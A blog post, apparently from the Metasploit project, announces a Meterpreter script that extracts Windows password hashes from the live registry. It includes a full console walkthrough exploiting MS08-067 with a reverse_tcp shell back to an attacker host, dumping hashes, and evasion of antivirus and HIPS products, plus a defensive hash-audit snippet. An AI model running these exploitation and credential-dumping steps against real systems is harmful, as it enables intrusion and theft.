Last updated at Wed, 27 Sep 2017 20:36:13 GMT

The Metasploit Meterpreter has supported the "hashdump" command (through the Priv extension) since before version 3.0. The "hashdump" command is an in-memory version of the pwdump tool: instead of loading a DLL into LSASS.exe, it allocates memory inside the process, injects raw assembly code, executes it via CreateRemoteThread, and then reads the captured hashes back out of memory. This avoids writing files to the drive and, by the same token, avoids being flagged by antivirus (AV) and host intrusion prevention (HIPS) products.

Over the last few years, many AV and HIPS products have added hooks to detect this behavior and block it at the API level. Unfortunately, the hooks are often implemented in a way that causes LSASS.exe to crash, which forces the entire system to either halt or reboot. This has made the "hashdump" command (along with pwdump and its friends) somewhat risky to use during a penetration test. One alternative to LSASS injection is to export the raw registry hives and then perform an offline extraction. This works, but it requires the hive files to be stored on the disk and currently requires external tools to use this method with the Metasploit Framework.

Over the last couple of days, I reimplemented the registry-based method as a Meterpreter script. The key difference is that instead of using the reg.exe command to export the raw hives, this script uses direct registry access to extract the SYSKEY and decrypt the raw LANMAN and NTLM hashes. It isn't the fastest way to do it, but it leaves no evidence on the target, avoids the majority of the HIPS products (unless they filter registry reads), and, most importantly, is 100% safe in terms of system stability. The output below demonstrates a machine being compromised through MS08-067 and then having the LANMAN/NTLM hashes extracted from the live registry.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.151
msf exploit(ms08_067_netapi) > set LPORT 4444
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.120:1041)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3ed7[...]
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:...
Guest:501:aad3b435b51404eeaad3b435b51404ee:...
HelpAssistant:1000:ce909bd50f46021bf4aa40680422f646:...
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:...::
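The hash lines above are in pwdump format (user:RID:LM hash:NT hash:::). As an added example, not part of the original post or of the Meterpreter script, here is a small Python audit that parses that format and flags what a defender reviewing such output would act on: accounts that still store an LM hash, accounts with a blank password, and the built-in RID 500 account. The sample lines and their non-empty hash values are constructed placeholders; the two constants for "no LM hash stored" and "NT hash of an empty password" are the well-known values.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Well-known constants: LM field written when no LM hash is stored, and NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample in the pwdump format shown above; the non-empty hash
# values are placeholders, not real hashes of any password.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1003:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:fedcba9876543210fedcba9876543210:::
"""

@dataclass
class HashEntry:
    user: str
    rid: int
    lm: str
    nt: str

def parse_pwdump_line(line: str) -> HashEntry:
    """Parse one 'user:rid:lm:nt:::' line; the trailing empty fields are optional."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError(f"malformed pwdump line: {line!r}")
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    for field in (lm, nt):
        if not HEX32.match(field):
            raise ValueError(f"bad hash field for {user}: {field!r}")
    return HashEntry(user, rid, lm, nt)

def audit_pwdump(text: str) -> Dict[str, List[str]]:
    """Flag hygiene problems a defender would act on after reviewing such a dump."""
    findings: Dict[str, List[str]] = {"lm_stored": [], "blank_password": [], "builtin_admin": []}
    for line in text.splitlines():
        if not line.strip():
            continue
        e = parse_pwdump_line(line)
        if e.lm != EMPTY_LM:
            findings["lm_stored"].append(e.user)        # LM hash still stored: NoLMHash not effective
        if e.nt == EMPTY_NT:
            findings["blank_password"].append(e.user)   # NT hash of the empty string
        if e.rid == 500:
            findings["builtin_admin"].append(e.user)    # built-in Administrator, whatever its name
    return findings
```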

The caveat: to run this Meterpreter script, you must already have access to a SYSTEM token. This is already the case if you are exploiting a system service, like the Server Service or most DCERPC vulnerabilities, but it can require a few additional steps if you only have administrative access. The reason is that the Administrators group does not have read access to the registry tree that contains the encrypted password hashes. The next blog post will go into the nitty-gritty details of impersonation and privilege escalation on the Windows platform.

-HD